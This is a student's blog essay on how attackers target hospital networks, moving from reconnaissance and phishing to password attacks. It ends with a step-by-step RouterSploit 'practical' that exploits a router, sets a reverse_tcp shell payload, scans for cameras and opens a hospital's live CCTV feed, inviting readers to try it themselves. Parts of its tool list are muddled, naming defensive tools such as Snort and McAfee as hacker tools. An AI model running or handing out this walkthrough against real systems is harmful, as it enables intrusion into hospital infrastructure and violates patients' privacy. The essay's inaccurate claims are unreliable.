cyber secuirity for hospitals

-BY ADITYA SINGH aditya043k@gmail.com

I choose this topic to write on because no one knows about how hackers can exploit the hospitals through cyberattacks in this blog I have tried to cover many topics on how hacker gain access on medical appliances and machines. I hope that this topic is helpful for hospital administration.

Gone forever are the days when a patient was treated by a single physician. Today, a team of physicians and specialized medical technicians rely on complex medical equipment to diagnose and treat patients. This collaboration is made possible because electronic medical records (EMRs) securely store large amounts of medical and clinical information, which is exchanged electronically among healthcare entities by an industry-specific Medical-Grade Network (MGN). This medical information is susceptible to being stolen or held for ransom and malicious hackers can even take direct control of connected active and passive medical devices over the internet and injure patients. The Health Information Technology for Economic and Clinical Health (HITECH) Act of 2009 provided financial incentives for Medicare and Medicaid providers who become “meaningful users” of EMRs. Among non-federal acute care hospitals, 76 percent were using a “basic” system by 2014. As of May 2015, more than 468,000 Medicare and Medicaid providers (87 percent) have received payments through the HITECH Act, totaling approximately $30.4 billion. as the implementation of the HITECH Act expanded, so has the cost of data breaches at healthcare facilities in the United States.

 

Footprinting

Footprinting is how the hacker starts his analysis of the target hospital network. The hacker sifts through open source material found on the Internet to learn all he can about the hospital, including who works there, which equipment is used there, and where the equipment is located. A hacker may visit the hospital, sniff the wireless spectrum, look in dumpsters, and use social engineering to assemble a very good picture of the hospital and its active medical devices to determine where the vulnerabilities are. Once the hacker knows who manufactured the device that he intends to attack, he finds a copy of the operating and maintenance manuals (many are available online). Unfortunately, those manuals usually reveal the default password set at the factory. To make matters worse, some manufacturers recommend that the healthcare facility keep the default password, because this makes it easier for the manufacturer’s technician to test the equipment or perform maintenance. This same glaring vulnerability makes hacking

the device simple. The hacker launches an account-harvesting attack to collect all the user account names on a computer network. Account harvesting involves using computer programs to search areas on the Internet to gather lists of email addresses from a number of sources, including chatrooms, domain names, instant message

users, message boards, newsgroups, online directories for web pages belonging to professional societies, medical web pages, and other online destinations. A sophisticated hacker uses data mining to analyze a vast amount of information about a target hospital.

Many hackers resort to social engineering attacks. Social engineering is the art and science of getting people to do something that you want that they might not do in a normal course of action. In addition to collecting information by technical means, hackers apply various methods of social engineerings, such as impersonating individuals on the telephone or other persuasive means (e.g., tricking, convincing, inducing,

enticing, or provoking) to encourage someone to disclose valuable information.

Attackers look for information about who the target does business with: suppliers and customers. And they are particularly interested in IT support staff. They gather this information to better understand staff roles and responsibilities. They may use this information to pose as someone from one of their suppliers or vendors. Attackers look for information, such as birthdays, who was recently promoted, or who just had a

baby. Hackers do not discount any information that they uncover. They even use bad relationships between the IT department and other offices as a wedge to gain information. Attackers send friend requests to hospital staff on Facebook, Match.com, LinkedIn, and any other Internet sites where people divulge personal information. Staff should never give away their GPS position, or location links, or send updates divulging where they will be on vacation. When asked, instead of saying “I’m going on vacation for two weeks,” I usually say, “I’m having a staycation and plan to sit at home cleaning my guns.” Hackers often use behavior-monitoring hacksThis involves observing the activities of hospital staff, MGN data traffic, and processes; and measuring activities against hospital policies and rules, baselines of normal activity, thresholds, and trends. Hackers have been known to resort to shoulder surfing, or using direct observation techniques, such as looking over a nurse’s shoulder to obtain personal access information (e.g., passwords, PINs, and security codes).

The hacker is not above dumpster diving to obtain passwords and the hospital’s directories by searching through discarded trash bins (also referred to as skipping ). Eavesdropping is a low-tech technique that hackers use to listen in to a private conversation to acquire information that can provide access to an MGN.

A hacker may go so far as to install a screen scraper virus or physical device that logs and captures information sent to a hospital staffer’s computer display. If a hacker cannot physically visit the hospital, he could use PlaceRaider to create a virtual layout of the hospital’s interior. This is a novel Trojan horse visual malware app surreptitiously installed on a staffer’s smartphone. It allows a hacker to engage in remote reconnaissance to obtain geolocation data and enlist its accelerometer to create a 3D map of the phone’s surroundings. A hacker can download images of the physical space, study the environment, and carefully construct a three-dimensional model of indoor

environments to survey the staffer’s private home or workplace. PlaceRaider can be used to photograph virtual objects in the environment, such as financial documents, information on computer monitors, and personally identifiable patient information

Scanning

After hackers research the target hospital using open source websites, such as vendor marketing materials,

awarded contracts, medical conference attendee lists, and LinkedIn and Facebook pages, the hacker

searches the Shodan database of devices, which are accessible over the Internet. The Shodan database

allows a hacker to find IP addresses and begin port scanning to identify which operating systems the hospital

uses and then figure out how to access the hospital’s networks. If the target hospital is accessible by Shodan

(it should not be), Shodan reveals all services running on the hospital’s computers, and allows hackers to

Share this information with others

Shodan website

Shodan results from the screen

Other common network-discovery hacking tools include the Google Hacking Diggity Project, Nmap, Snort, Kismet, Nessus, McAfee, Sophia, and Bandolier.

Once the hacker knows which software applications are running on the target hospital’s network, he can develop a specific set of tools to exploit known vulnerabilities. For example, let’s say that the hacker learns that the building controls system at the target hospital is running Siemens SIMATIC STEP 7 TIA (Portal). In February 2015, Siemens reported two vulnerabilities on that software. One vulnerability allows a successful,

remote man-in-the-middle attack. The other allows a hacker with local access to reconstruct protection level passwords. Although a Siemens software update is available, it is likely that it hasn’t been installed in many hospitals. A hacker will probably launch an address space probe attack when he finds your hospital networks on

the Shodan website and locates your IP address space. The hacker is looking for security holes that might be exploited on the hospital’s network, such as unpatched vulnerabilities. A hacker uses a passive technique called network sniffing to monitor hospital network communication, decode protocols, and examine headers and network traffic for information of interest. It is both a review technique and target identification and analysis technique. The hacker may launch a probing attack to attempt to connect to well-known services that may be running on the hospital network to

see which operating system exists and potentially identify the version of the software that it is running. A smart hacker will attempt a few common usernames and password combinations on several computers, resulting in failed login attempts. This is called a doorknob-rattling attack and can go undetected unless the data

related to login failures from all the hosts is collected and aggregated to check for doorknob rattling from any remote destination. If the hacker is really ambitious, he may resort to emanations analysis, or obtaining data by monitoring and resolving electronic signals emitted by medical equipment that contains the data, but is not designed to communicate the data.

Programs that are frequently installed together may be described as parts of the same spyware package, even if they function separately. The following are some examples:

•CoolWebSearch (https://en.wikipedia.org/wiki/CoolWebSearch )is a group of programs that takes advantage of Internet Explorer

vulnerabilities. The package directs traffic to advertisements on websites, including

CoolWebSearch.com. It displays pop-up ads, rewrites search engine results, and

alters the infected computer’s hosts file to direct Domain Name System (DNS)

lookups to these sites.

•HuntBar(https://en.wikipedia.org/wiki/HuntBar )is also known as WinTools or Adware.

Internet Optimizer, also known as DyFuCa, redirects Internet Explorer error pages

to advertising. When users follow a broken link or enter an erroneous URL, they see

a page of advertisements. However, because password-protected websites use the

same mechanism as HTTP errors, Internet Optimizer makes it impossible for the

user to access password-protected sites.

Network Mapping

By this point, the hacker can draw a very detailed layout of the hospital’s network and visualize the total network environment. The hacker’s network map is probably more current than your copy because he has found what’s actually there.

Oversimplified network map—the point is that everything’s connected

How Hackers Gain Access to a

Health care Facility or Hospital

Network

THE MOST COMMON ATTACK THAT A HACKER CAN DO IS

Email Phishing AttacK

Email is the preferred method of gaining access to any network that has Internet access. A hacker will send an email containing active content (carries out or triggers actions automatically without the intervention of a user), such as a Remote Access Trojan (RAT), to a hospital employee, such as a biomedical equipment technician (BMET) or a building maintenance technician. According to a 2015 data breach investigations

report, 23 percent of recipients of phishing emails open them and 11 percent click an attachment. Typically, doctors, nurses, and building maintenance personnel access their email using the only workstation on their desk. I recommend that hospitals increase awareness of the importance of not opening suspicious emails.

TABLE lists some email do’s and don’ts.

DO’S	DONT’S
Don’t open suspicious emails	Don’t use a preview pane for email, use plain text only
Don’t click links to websites in any emails	Don’t respond to the email that demands that you update information and gives a link to click.
Don’t respond to emails that threaten dire consequences	Don’t open the email from strangers.
Always look for digital signatures.	Scan all attachments.

Appliance Hacks

A hacker can gain access to a hospital network through appliance hacks. With the growth of the Internet of Things, even common appliances such as dishwashers, coffee makers, clothes dryers, and nursery-room baby monitors connect to the Internet and could be used as an access and pivot point. Manufacturers use this capability to troubleshoot the performance of their equipment, monitor usage, and improve the customer

“ experience .” Unfortunately, knowing when you use the appliance provides data that could help hackers

learn your habits and schedule, and geolocate your current position.

Password Cracker

Hackers have access to a wide range of tools to decrypt passwords that they find on a hospital network. The last

resort is a brute-force attack using a program such as Zip Password Cracker Pro.

Cyber-Hygiene Password Tips

Use a strong password or passphrase. Change the password every 90 days.

Never use a previous password again. Use lowercase and uppercase letters, numbers, and special

characters ($, #, ?, %, &, etc.).

Do not use a common phrase

(123thequickbrownfox, etc.).

Don’t write down the password and slip it in the top drawer

of your desk.

Password should be at least 14 characters. Don’t give anyone your password— ever

PRACTICAL TIME

NOW I WILL SHOW YOU HOW HACKERS GAIN THE ACCESS ON HOSPITALS CCTV CAMERAS BY EXPLOITING  ROUTER  {note that:- for this practical your wifi must have to monitor mode support }

os used:- Kali Linux

• first, you have to download routersploit git package on your system
• commands that you have to enter in the terminal
• cd Desktop/
• git clone https://github.com/threat9/routersploit
• cd rotersploit/
• ls
• pip3 install -r requirements.txt
• ./rsf.py
• show exploits
• show creds
• search tplink
• show scanners
• use scanners/routers/router_scan
• show info
• show options
• IP r {to show router ip}
• copy that IP
• set target {ip of router}
• Nmap -sV {ip of your router}
• set threads 30
• if the target is vulnerable then write the commands
• use exploits {copy the vulnerable link}
• show options
• set target {ip or r}
• check
• run
• show payloads
• set payload reverse_tcp
• show options
• set lhost {ip or r}
• run
• back
• exit
• back
• use scanners/cameras/camera_scan
• show info
• show options
• set traget{ip}
• set http_port 8080
• run
• copy link(1) 192.168….
• and open in the browser
• use any user name and password

AND IT’S DONE NOW THE HACKER CAN SEE THE LIVE CCTV RECORDING IF YOU DON’T BELIEVE IT YOU CAN TRY IT YOURSELF :)

MORAL OF THIS PRACTICAL:-HOSPITAL ADMINISTRATION MUST

SCAN THEIR ROUTER EVERY MONTH FOR VULNERABILITIES AND FIX IT AS SOON AS POSSIBLE.

IF THERE ARE ANY SPELLING OR GRAMMAR MISTAKES PLEASE IGNORE IT BUT I DON’T THINK IT WILL COME BECAUSE I HAVE CHECKED IT THRICE WHILE POSTING IT

THANK YOU 

SUMMITED BY –ADITYA SINGH

CLASS-XII-A

ROLL NO:-2

SCHOOL:-KENDRIYA VIDYALAYA NO.2 EME BARODA (GUJRAT)